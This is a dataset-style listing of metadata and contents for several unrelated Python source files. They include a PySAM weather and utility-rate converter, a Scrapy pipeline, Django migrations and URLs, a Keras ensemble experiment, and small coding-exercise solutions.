blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fe85918273b3ffd9dc2339a9b0f97a381f0ab2db
|
22f80b809204010da7e8217374a2ca78a5613308
|
/files/ResourceTools.py
|
8f03f0628ceb8a13b409ba83e82ad66a8f46bbb8
|
[
"BSD-3-Clause"
] |
permissive
|
frohro/pysam
|
23421f506c25e3f2a57ef2533029e64dc856612d
|
cac4423410d948d886b3f19c83a73ac29ab618ae
|
refs/heads/master
| 2021-02-09T03:46:56.540560 | 2020-03-17T13:32:05 | 2020-03-17T13:32:05 | 244,236,139 | 0 | 0 |
BSD-3-Clause
| 2020-03-01T22:49:09 | 2020-03-01T22:49:08 | null |
UTF-8
|
Python
| false | false | 6,820 |
py
|
import csv
import os
from collections import defaultdict
def TMY_CSV_to_solar_data(filename):
"""
Format a TMY csv file as 'solar_resource_data' dictionary for use in PySAM.
:param: filename:
any csv resource file formatted according to NSRDB
:return: dictionary for PySAM.Pvwattsv7.Pvwattsv7.SolarResource, and other models
"""
if not os.path.isfile(filename):
raise FileNotFoundError(filename + " does not exist.")
wfd = defaultdict(list)
with open(filename) as file_in:
info = []
for i in range(2):
info.append(file_in.readline())
info[i] = info[i].split(",")
if "Time Zone" not in info[0]:
raise ValueError("`Time Zone` field not found in solar resource file.")
latitude = info[1][info[0].index("Latitude")]
longitude = info[1][info[0].index("Longitude")]
tz = info[1][info[0].index("Time Zone")]
elev = info[1][info[0].index("Elevation")]
reader = csv.DictReader(file_in)
for row in reader:
for col, dat in row.items():
if len(col) > 0:
wfd[col].append(float(dat))
weather = dict()
weather['tz'] = float(tz)
weather['elev'] = float(elev)
weather['lat'] = float(latitude)
weather['lon'] = float(longitude)
weather['year'] = wfd.pop('Year')
weather['month'] = wfd.pop('Month')
weather['day'] = wfd.pop('Day')
weather['hour'] = wfd.pop('Hour')
weather['minute'] = wfd.pop('Minute')
weather['dn'] = wfd.pop('DNI')
weather['df'] = wfd.pop('DHI')
weather['gh'] = wfd.pop('GHI')
weather['wspd'] = wfd.pop('Wind Speed')
weather['tdry'] = wfd.pop('Temperature')
return weather
def SRW_to_wind_data(filename):
"""
Format as 'wind_resource_data' dictionary for use in PySAM.
:param: filename:
srw wind resource file
:return: dictionary for PySAM.Windpower.Windpower.Resource
"""
if not os.path.isfile(filename):
raise FileNotFoundError(filename + " does not exist.")
data_dict = dict()
field_names = ('Temperature', 'Pressure', 'Speed', 'Direction')
fields_id = (1, 2, 3, 4)
with open(filename) as file_in:
file_in.readline()
file_in.readline()
fields = str(file_in.readline().strip()).split(',')
file_in.readline()
heights = str(file_in.readline().strip()).split(',')
data_dict['heights'] = [float(i) for i in heights]
data_dict['fields'] = []
for field_name in fields:
if field_name not in field_names:
raise ValueError(field_name + " required for wind data")
data_dict['fields'].append(field_names.index(field_name) + 1)
data_dict['data'] = []
reader = csv.reader(file_in)
for row in reader:
data_dict['data'].append([float(i) for i in row])
return data_dict
def URDBv7_to_ElectricityRates(urdb_response):
"""
Formats response from Utility Rate Database API version 7 for use in PySAM
i.e.
model = PySAM.UtilityRate5.new()
rates = PySAM.ResourceTools.URDBv7_to_ElectricityRates(urdb_response)
model.ElectricityRates.assign(rates)
:param: urdb_response
dictionary with response fields following https://openei.org/services/doc/rest/util_rates/?version=7
:return: dictionary for PySAM.UtilityRate5.UtilityRate5.ElectricityRates
"""
def try_get_schedule(urdb_name, data_name):
if urdb_name in urdb_response.keys():
data[data_name] = urdb_response[urdb_name]
for i in range(12):
for j in range(24):
data[data_name][i][j] += 1
def try_get_rate_structure(urdb_name, data_name):
mat = []
if urdb_name in urdb_response.keys():
structure = urdb_response[urdb_name]
for i, period in enumerate(structure):
for j, entry in enumerate(period):
rate = entry['rate']
if 'adj' in entry.keys():
rate += entry['adj']
tier_max = 1e38
if 'max' in entry.keys():
tier_max = entry['max']
sell = 0
if 'sell' in entry.keys():
sell = entry['sell']
units = ['kwh', 'kw']
if 'unit' in entry.keys():
if entry['unit'].lower() not in units:
raise RuntimeError("UtilityRateDatabase error: unrecognized unit in rate structure")
mat.append((i + 1, j + 1, tier_max, 0.0, rate, sell))
data[data_name] = mat
data = dict()
data['en_electricity_rates'] = 1
rules = urdb_response['dgrules']
if rules == "Net Metering":
data['ur_metering_option'] = 0
elif rules == "Net Billing Instantaneous":
data['ur_metering_option'] = 2
elif rules == "Net Billing Hourly":
data['ur_metering_option'] = 3
elif rules == "Buy All Sell All":
data['ur_metering_option'] = 4
if 'fixedchargefirstmeter' in urdb_response.keys():
fixed_charge = urdb_response['fixedchargefirstmeter']
fixed_charge_units = urdb_response['fixedchargeunits']
if fixed_charge_units == "$/day":
fixed_charge *= 365/30
elif fixed_charge_units == "$/year":
fixed_charge /= 12
data['ur_fixed_monthly_charge'] = fixed_charge
if 'mincharge' in urdb_response.keys():
min_charge = urdb_response['mincharge']
min_charge_units = urdb_response['minchargeunits']
if min_charge_units == "$/year":
data['ur_annual_min_charge'] = min_charge
else:
if min_charge_units == "$/day":
min_charge *= 365 / 30
data['ur_monthly_min_charge'] = min_charge
try_get_schedule('energyweekdayschedule', 'ur_ec_sched_weekday')
try_get_schedule('energyweekendschedule', 'ur_ec_sched_weekend')
if 'flatdemandmonths' in urdb_response.keys():
data['ur_dc_enable'] = 1
flat_mat = []
flat_demand = urdb_response['flatdemandmonths']
for i in range(12):
flat_mat.append([i, 1, 1e38, flat_demand[i]])
data['ur_dc_flat_mat'] = flat_mat
try_get_rate_structure('energyratestructure', 'ur_ec_tou_mat')
try_get_rate_structure('flatdemandstructure', 'ur_dc_flat_mat')
try_get_rate_structure('demandratestructure', 'ur_dc_tou_mat')
try_get_schedule('demandweekdayschedule', 'ur_dc_sched_weekday')
try_get_schedule('demandweekendschedule', 'ur_dc_sched_weekend')
return data
|
[
"[email protected]"
] | |
11904ef28fb8158f2089b88efb705ee390701ba2
|
47008724082fd7fa39b87416bcd1d7633e9d8ef7
|
/04-使用Item封装数据/example/example/pipelines.py
|
65d9fcd59f07f0c6977eae5bb000f890f65df5e8
|
[
"Apache-2.0"
] |
permissive
|
gy0109/matser-scrapy-liushuo
|
1909d5902dcaf9a119a1cbf42dff9c9434fb58cc
|
99afa51aa30248282bf6d86f8a98a28b086f54ff
|
refs/heads/master
| 2020-05-16T09:25:13.429519 | 2019-04-25T12:34:30 | 2019-04-25T12:34:30 | 182,947,663 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 756 |
py
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class ExamplePipeline(object):
def process_item(self, item, spider):
return item
# pipeline不需要继承什么基类,只需要实现特定的方法 open_spider close_spider process_item
# process_item是必须要有的 用来处理spider怕取到的数据 item: 爬取到的一项数据 spider 爬取的spider对象
class BookPipeline(object):
# 汇率
exchange_rate = 8.5309
def process_item(self, item, spider):
price = float(item['price'][1:])
item['price'] = '¥%.2f'% price
return item
|
[
"[email protected]"
] | |
c303cf21bf6d1ff3eeb3773c71c758ca5533d3e5
|
b4c93bad8ccc9007a7d3e7e1d1d4eb8388f6e988
|
/ph_locations/migrations/0002_auto_20210319_1358.py
|
6de5bb1e1c5891f630460b5a245aa21ef859f2f2
|
[] |
no_license
|
flashdreiv/fis
|
39b60c010d0d989a34c01b39ea88f7fc3be0a87d
|
b93277785d6ad113a90a011f7c43b1e3e9209ec5
|
refs/heads/main
| 2023-04-02T12:46:32.249800 | 2021-03-31T00:27:29 | 2021-03-31T00:27:29 | 343,431,800 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 802 |
py
|
# Generated by Django 3.1.7 on 2021-03-19 05:58
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ph_locations', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='city',
name='name',
field=models.CharField(max_length=80, null=True),
),
migrations.AddField(
model_name='city',
name='province',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='ph_locations.province'),
),
migrations.AddField(
model_name='province',
name='name',
field=models.CharField(max_length=80, null=True),
),
]
|
[
"[email protected]"
] | |
6b172bfdaa735bf76829cc5489e174778ff42719
|
0910e259a9bd252300f19b2ff22049d640f19b1a
|
/keras1/keras29_LSTM_ensemble2_differ.py
|
d841844016d8c7af269a3cb1dde3aa105b767905
|
[] |
no_license
|
kimtaeuk-AI/Study
|
c7259a0ed1770f249b78f096ad853be7424a1c8e
|
bad5a0ea72a0117035b5e45652819a3f7206c66f
|
refs/heads/master
| 2023-05-05T12:34:52.471831 | 2021-05-22T16:16:12 | 2021-05-22T16:16:12 | 368,745,041 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,932 |
py
|
#2개의 모델을 하나는 LSTM, 하나는 DENSE로
#앙상블로 구현
# 29_1번 과 성능 비교
import numpy as np
import tensorflow as tf
x1 = np.array([[1,2,3], [2,3,4], [3,4,5], [4,5,6], [5,6,7], [6,7,8], [7,8,9], [8,9,10], [9,10,11], [10,11,12], [20,30,40], [30,40,50], [40,50,60]])
x2 = np.array([[10,20,30],[20,30,40],[30,40,50],[40,50,60],[50,60,70],[60,70,80],[70,80,90],[80,90,100],[90,100,110],[100,110,120],[2,3,4],[3,4,5],[4,5,6]])
y = np.array([4,5,6,7,8,9,10,11,12,13,50,60,70])
x1_predict = np.array([55,65,75])
x2_predict = np.array([65,75,85])
print(x1.shape) #(13,3)
print(x2.shape) #(13,3)
print(y.shape) #(13,)
print(x1_predict.shape) #(3,)
print(x2_predict.shape) #(3,)
x1_LSTM=x1.reshape(x1.shape[0],x1.shape[1],1)
x2_LSTM=x2.reshape(x2.shape[0],x1.shape[1],1)
# x1_predict = x1_predict.reshape(1, 3,1)
from sklearn.model_selection import train_test_split
x1_train, x1_test, y_train, y_test = train_test_split(x1, y, train_size=0.8, shuffle=True, random_state=66)
x2_train, x2_test, y_train, y_test = train_test_split(x2, y, train_size=0.8, shuffle=True, random_state=66)
# from sklearn.preprocessing import MinMaxScaler
# scaler = MinMaxScaler()
# scaler.fit(x1_train)
# # scaler.fit(x2_train)
# # scaler.fit(x1_test)
# # scaler.fit(x2_test)
# x1_train = scaler.transform(x1_train)
# x1_train = scaler.transform(x1_train)
# x1_test = scaler.transform(x1_test)
# x2_test = scaler.transform(x2_test)
# from tensorflow.keras.callbacks import EarlyStopping
# early_stopping = EarlyStopping(monitor='loss',patience=20, mode='min')
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Input, concatenate, LSTM
input1 = Input(shape=(3,1))
dense1 = LSTM(10, activation='relu')(input1)
dense1 = Dense(10)(dense1)
input2 = Input(shape=(3))
dense2 = Dense(10, activation='relu')(input2)
dense2 = Dense(10)(dense2)
merge1 = concatenate([dense1, dense2])
# middle1 = Dense(10, activation='relu')(merge1)
# middle1 = Dense(10)(middle1) #middle 안해도 됨
output1 = Dense(10)(merge1)
output1 = Dense(30)(output1)
output1 = Dense(1)(output1)
# output2 = Dense(10)(middle1)
# output2 = Dense(1)(output2)
model = Model(inputs=[input1, input2], outputs=output1)
model.compile(loss = 'mse', optimizer='adam', metrics='mae')
model.fit([x1_train,x2_train], y_train, epochs=500, validation_split=0.2, batch_size=1)
loss = model.evaluate([x1_test,x2_test], y_test)
x1_pred= x1_predict.reshape(1,3,1) # (3,) -> (1, 3)(dense) ->(1, 3, 1)(LSTM)
x2_pred= x2_predict.reshape(1, 3, 1) # (3,) -> (1, 3)(dense) ->(1, 3, 1)(LSTM)
y1_predict = model.predict([x1_pred,x2_pred])
print('loss = ', loss)
print('result : ', y1_predict)
# loss = [5.709522724151611, 1.6373800039291382] -왼 LSTM 오른쪽이 더좋다
# result : [[94.837204]]
# loss = [2.0639169216156006, 1.1473256349563599]
# result : [[78.38083]] - train_test_split
|
[
"[email protected]"
] | |
19c5bac30dc1812153c6ada47917d8a1ad43f1cf
|
a4cfe8b47d3da97d335b210994fe03f8aa5b2f77
|
/vint/linting/config/config_project_source.py
|
0869f9ee8a02f71819a20b3062f265425bec19e2
|
[
"MIT"
] |
permissive
|
blueyed/vint
|
e6e7bbbf43a7b337f60d05d768d424fe400d40d8
|
9ae019d6e7863a4c9634faa39b9b75111dd2ad36
|
refs/heads/master
| 2021-01-13T16:40:04.962921 | 2016-12-22T12:00:45 | 2016-12-22T12:00:45 | 78,246,540 | 0 | 0 | null | 2017-01-06T23:28:35 | 2017-01-06T23:28:35 | null |
UTF-8
|
Python
| false | false | 805 |
py
|
from pathlib import Path
from vint.asset import get_asset_path
from vint.linting.config.config_file_source import ConfigFileSource
PROJECT_CONFIG_FILENAMES = [
'.vintrc.yaml',
'.vintrc.yml',
'.vintrc',
]
VOID_CONFIG_PATH = get_asset_path('void_config.yaml')
class ConfigProjectSource(ConfigFileSource):
def get_file_path(self, env):
proj_conf_path = VOID_CONFIG_PATH
path_list_to_search = [Path(env['cwd'])] + list(Path(env['cwd']).parents)
for project_path in path_list_to_search:
for basename in PROJECT_CONFIG_FILENAMES:
proj_conf_path_tmp = project_path / basename
if proj_conf_path_tmp.is_file():
proj_conf_path = proj_conf_path_tmp
break
return proj_conf_path
|
[
"[email protected]"
] | |
0eea1f221c0a6316a2eed2457dffd111f15c8a0b
|
16e69196886254bc0fe9d8dc919ebcfa844f326a
|
/edc/core/bhp_content_type_map/migrations/0005_update_module_name.py
|
67a886c53b822966a1fc216991741f16ccb05bd3
|
[] |
no_license
|
botswana-harvard/edc
|
b54edc305e7f4f6b193b4498c59080a902a6aeee
|
4f75336ff572babd39d431185677a65bece9e524
|
refs/heads/master
| 2021-01-23T19:15:08.070350 | 2015-12-07T09:36:41 | 2015-12-07T09:36:41 | 35,820,838 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,009 |
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Remember to use orm['appname.ModelName'] rather than "from appname.models..."
ContentTypeMap = orm['bhp_content_type_map.ContentTypeMap']
for obj in ContentTypeMap.objects.all():
obj.module_name = obj.model
obj.save()
print (obj.app_label, obj.module_name)
def backwards(self, orm):
"Write your backwards methods here."
pass
models = {
'bhp_content_type_map.contenttypemap': {
'Meta': {'ordering': "['name']", 'unique_together': "(['app_label', 'model'],)", 'object_name': 'ContentTypeMap'},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'hostname_created': ('django.db.models.fields.CharField', [], {'default': "'mac.local'", 'max_length': '50', 'db_index': 'True', 'blank': 'True'}),
'hostname_modified': ('django.db.models.fields.CharField', [], {'default': "'mac.local'", 'max_length': '50', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'module_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'user_created': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'db_index': 'True'}),
'user_modified': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'db_index': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['bhp_content_type_map']
symmetrical = True
|
[
"[email protected]"
] | |
4404bba47db646d9416036a3aa8e535334e7902f
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4060/codes/1684_1100.py
|
47661cdbda903bedb36e8d7ab2f89e70b5985e55
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 541 |
py
|
# Teste seu código aos poucos.
# Não teste tudo no final, pois fica mais difícil de identificar erros.
# Ao testar sua solução, não se limite ao caso de exemplo.
a=int(input("Entrada: "))
print("Entrada:",a)
if((a!=2)and(a!=5)and(a!=10)and(a!=20)and(a!=50)and(a!=100)):
print("Animal: Invalido")
elif(a==2):
print("Animal: Tartarura")
elif(a==5):
print("Animal: Garca")
elif(a==10):
print("Animal: Arara")
elif(a==20):
print("Animal: Mico-leao-dourado")
elif(a==50):
print("Animal: Onca-pintada")
else:
print("Animal: Garoupa")
|
[
"[email protected]"
] | |
fc1fa4990f3eb7c426991f2e920afe5ac67e8b2a
|
150d9e4cee92be00251625b7f9ff231cc8306e9f
|
/ReverseWordsIII.py
|
35bceae2ed4be0c631984cf4c703decb182946b7
|
[] |
no_license
|
JerinPaulS/Python-Programs
|
0d3724ce277794be597104d9e8f8becb67282cb0
|
d0778178d89d39a93ddb9b95ca18706554eb7655
|
refs/heads/master
| 2022-05-12T02:18:12.599648 | 2022-04-20T18:02:15 | 2022-04-20T18:02:15 | 216,547,245 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,277 |
py
|
'''
557. Reverse Words in a String III
Given a string s, reverse the order of characters in each word within a sentence while still preserving whitespace and initial word order.
Example 1:
Input: s = "Let's take LeetCode contest"
Output: "s'teL ekat edoCteeL tsetnoc"
Example 2:
Input: s = "God Ding"
Output: "doG gniD"
Constraints:
1 <= s.length <= 5 * 104
s contains printable ASCII characters.
s does not contain any leading or trailing spaces.
There is at least one word in s.
All the words in s are separated by a single space.
'''
class Solution(object):
def reverseWords(self, s):
"""
:type s: str
:rtype: str
"""
word_list = s.split()
word_list_list = []
result = ""
for word in word_list:
temp = list(word)
word_list_list.append(temp)
for word in word_list_list:
start = 0
end = len(word) - 1
while start <= end:
temp = word[start]
word[start] = word[end]
word[end] = temp
start = start + 1
end = end - 1
for word in word_list_list:
result = result + ''.join(word) + " "
return result[:-1]
obj = Solution()
print(obj.reverseWords("Let's take LeetCode contest"))
|
[
"[email protected]"
] | |
5972e9b3b763273f9a652d66f3d080b66c693961
|
6dedbcff0af848aa979574426ad9fa3936be5c4a
|
/cengal/parallel_execution/coroutines/coro_standard_services/remote_nodes/versions/v_0/request_class_info.py
|
fb2ff414d2289c06f43f46ac97d35a61e59d0cfe
|
[
"Apache-2.0"
] |
permissive
|
FI-Mihej/Cengal
|
558d13541865e22006431bd1a1410ad57261484a
|
d36c05f4c90dfdac7296e87cf682df2f4d367e4b
|
refs/heads/master
| 2023-06-08T00:39:39.414352 | 2023-06-05T21:35:50 | 2023-06-05T21:35:50 | 68,829,562 | 10 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,043 |
py
|
#!/usr/bin/env python
# coding=utf-8
# Copyright © 2012-2023 ButenkoMS. All rights reserved. Contacts: <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module Docstring
Docstrings: http://www.python.org/dev/peps/pep-0257/
"""
__author__ = "ButenkoMS <[email protected]>"
__copyright__ = "Copyright © 2012-2023 ButenkoMS. All rights reserved. Contacts: <[email protected]>"
__credits__ = ["ButenkoMS <[email protected]>", ]
__license__ = "Apache License, Version 2.0"
__version__ = "3.2.6"
__maintainer__ = "ButenkoMS <[email protected]>"
__email__ = "[email protected]"
# __status__ = "Prototype"
__status__ = "Development"
# __status__ = "Production"
from enum import Enum
from cengal.parallel_execution.coroutines.coro_scheduler import *
from cengal.parallel_execution.coroutines.coro_tools.await_coro import *
from cengal.parallel_execution.coroutines.coro_standard_services.asyncio_loop import *
from cengal.parallel_execution.coroutines.coro_standard_services.loop_yield import CoroPriority
from cengal.parallel_execution.coroutines.coro_standard_services.put_coro import *
from cengal.parallel_execution.coroutines.coro_standard_services.timer_func_runner import *
from cengal.file_system.file_manager import path_relative_to_current_dir
from cengal.time_management.load_best_timer import perf_counter
from cengal.data_manipulation.serialization import *
from typing import Hashable, Tuple, List, Any, Dict, Callable, Type
from cengal.introspection.inspect import get_exception, entity_owning_module_importable_str, entity_owning_module_info_and_owning_path, entity_properties
from cengal.io.core.memory_management import IOCoreMemoryManagement
from cengal.parallel_execution.asyncio.efficient_streams import StreamManagerIOCoreMemoryManagement, TcpStreamManager, UdpStreamManager, StreamManagerAbstract
from cengal.code_flow_control.smart_values import ValueExistence
from cengal.io.named_connections.named_connections_manager import NamedConnectionsManager
from cengal.code_flow_control.args_manager import number_of_provided_args
from cengal.data_manipulation.serialization import Serializer, Serializers, best_serializer
from cengal.code_flow_control.args_manager import find_arg_position_and_value, UnknownArgumentError
from cengal.data_generation.id_generator import IDGenerator, GeneratorType
from cengal.system import PLATFORM_NAME, PYTHON_VERSION
from importlib import import_module
import sys
import os
import asyncio
import lmdb
from .exceptions import *
from .commands import *
from .class_info import *
class LocalRequestClassInfo(LocalClassInfo):
def __init__(self, local_id: Hashable, request: Request) -> None:
super().__init__(local_id, type(request))
self._properties: Dict[str, Hashable] = {property_name: index for index, property_name in enumerate(entity_properties(request))} # key: property name; value: property id
self._properties_tuple: Tuple[Tuple[str, Hashable]] = tuple(self._properties.items())
def __call__(self) -> Type:
return {
CommandDataFieldsDeclareServiceRequestClass.local_id.value: self._local_id,
CommandDataFieldsDeclareServiceRequestClass.class_name.value: self._class_name,
CommandDataFieldsDeclareServiceRequestClass.module_importable_str.value: self._module_importable_str,
CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value: self._properties_tuple,
}
@property
def properties(self):
return self._properties
@property
def properties_tuple(self):
return self._properties_tuple
def request_to_data(self, request: Request) -> Dict:
return {
CommandDataFieldsServiceRequestWithRequestClass.request_class_id.value: self._local_id,
CommandDataFieldsServiceRequestWithRequestClass.properties_tuple.value: tuple(((property_id, getattr(request, property_name)) for property_name, property_id in self._properties_tuple)),
}
class RemoteRequestClassInfo(RemoteClassInfo):
def __init__(self, local_id: Hashable, class_name: str, module_importable_str: str, properties_tuple: Tuple[Tuple[str, Hashable]]) -> None:
super().__init__(local_id, class_name, module_importable_str)
self._properties_tuple: Tuple[Tuple[str, Hashable]] = properties_tuple
self._properties: Dict[Hashable, str] = {index: property_name for property_name, index in properties_tuple} # key: property id; value: property name
@classmethod
def from_data(cls, data: Dict[Hashable, Any]) -> 'RemoteRequestClassInfo':
local_id: Hashable = data[CommandDataFieldsDeclareServiceRequestClass.local_id.value]
class_name: str = data[CommandDataFieldsDeclareServiceRequestClass.class_name.value]
module_importable_str: str = data[CommandDataFieldsDeclareServiceRequestClass.module_importable_str.value]
properties_tuple: Tuple[Tuple[str, Hashable]] = data[CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value]
return cls(local_id, class_name, module_importable_str, properties_tuple)
def __call__(self, data: Dict) -> Request:
request: Request = self.class_type()
properties_tuple: Tuple[Tuple[Hashable, Any]] = data[CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value]
for index, value in properties_tuple:
name: str = self._properties[index]
setattr(request, name, value)
return request
|
[
"[email protected]"
] | |
c7be3da8472cb8def0f76e0cac71b79a7063ba14
|
c829275111b9025dcccc9ac1b92d8dc51adbb71d
|
/photo/urls.py
|
4fec7ab88e9eb5f629a088b997138a2b641ed5cb
|
[
"MIT"
] |
permissive
|
Ken-mbira/PHOTO_BOOK
|
f1bd1bd65af228b0600bf69da12840897eb109ad
|
d47cd8dabd4b92e3befdafe2d99db266be31ffff
|
refs/heads/master
| 2023-08-19T06:55:07.309342 | 2021-10-12T11:05:00 | 2021-10-12T11:05:00 | 414,297,623 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 521 |
py
|
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from . import views
urlpatterns = [
path('',views.index,name = 'home'),
path('images/',views.images,name = 'images'),
path('images/<int:pk>',views.image_spec,name = 'image'),
path('category/<int:pk>',views.image_category,name = 'category'),
path('search',views.search_images, name="search")
]
if settings.DEBUG:
urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
|
[
"[email protected]"
] | |
20cf30291dd3e1ce42e9eac92e98cb83666fbc14
|
303bac96502e5b1666c05afd6c2e85cf33f19d8c
|
/solutions/python3/946.py
|
08e5a7f4e305aa8dfddd5a773566d9bdd70744e5
|
[
"MIT"
] |
permissive
|
jxhangithub/leetcode
|
5e82f4aeee1bf201e93e889e5c4ded2fcda90437
|
0de1af607557d95856f0e4c2a12a56c8c57d731d
|
refs/heads/master
| 2022-05-22T12:57:54.251281 | 2022-03-09T22:36:20 | 2022-03-09T22:36:20 | 370,508,127 | 1 | 0 |
MIT
| 2022-03-09T22:36:20 | 2021-05-24T23:16:10 | null |
UTF-8
|
Python
| false | false | 392 |
py
|
class Solution:
def validateStackSequences(self, pushed, popped):
"""
:type pushed: List[int]
:type popped: List[int]
:rtype: bool
"""
arr, i = [], 0
for num in pushed:
arr.append(num)
while arr and arr[-1] == popped[i]:
i += 1
arr.pop()
return arr == popped[i:][::-1]
|
[
"[email protected]"
] | |
f2a2c09d102ebb4c12b5678990d4b07e6fa71280
|
16eaa90eec58137c7cf0e429e574499d00ee21f2
|
/apps/manga/models/manga.py
|
325ffa9c350f2a247de6aad14b844a1d38c33887
|
[
"MIT"
] |
permissive
|
eliezer-borde-globant/lemanga
|
53c48f91f5df4671c1653ab927acab3c95097468
|
57c799804754f6a91fd214faac84d9cd017fc0c4
|
refs/heads/master
| 2023-02-16T23:25:49.889702 | 2020-12-28T17:27:49 | 2020-12-28T17:27:49 | 322,420,102 | 0 | 0 |
MIT
| 2020-12-17T23:10:32 | 2020-12-17T21:43:56 | null |
UTF-8
|
Python
| false | false | 748 |
py
|
from __future__ import unicode_literals
import uuid
from django.core.urlresolvers import reverse_lazy
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from autoslug import AutoSlugField
@python_2_unicode_compatible
class Manga(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(max_length=200, unique=True)
slug = AutoSlugField(populate_from='name', unique=True, always_update=True)
class Meta:
verbose_name = "Manga"
verbose_name_plural = "Mangas"
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse_lazy('detail-manga', kwargs={"name": self.slug})
|
[
"[email protected]"
] | |
528f4f027317f1d22c63b7a145d3182c87daa77f
|
86fc644c327a8d6ea66fd045d94c7733c22df48c
|
/scripts/managed_cpe_services/customer/single_cpe_dual_wan_site/single_cpe_dual_wan_site_services/cpe_primary_wan/end_points/bgp_peers/service_customization.py
|
7e389e7294aa0bde9644faa5fec5bf5a73b91948
|
[] |
no_license
|
lucabrasi83/anutacpedeployment
|
bfe703657fbcf0375c92bcbe7560051817f1a526
|
96de3a4fd4adbbc0d443620f0c53f397823a1cad
|
refs/heads/master
| 2021-09-24T16:44:05.305313 | 2018-10-12T02:41:18 | 2018-10-12T02:41:18 | 95,190,459 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,162 |
py
|
#
# This computer program is the confidential information and proprietary trade
# secret of Anuta Networks, Inc. Possessions and use of this program must
# conform strictly to the license agreement between the user and
# Anuta Networks, Inc., and receipt or possession does not convey any rights
# to divulge, reproduce, or allow others to use this program without specific
# written authorization of Anuta Networks, Inc.
#
# Copyright (c) 2015-2016 Anuta Networks, Inc. All Rights Reserved.
#
#
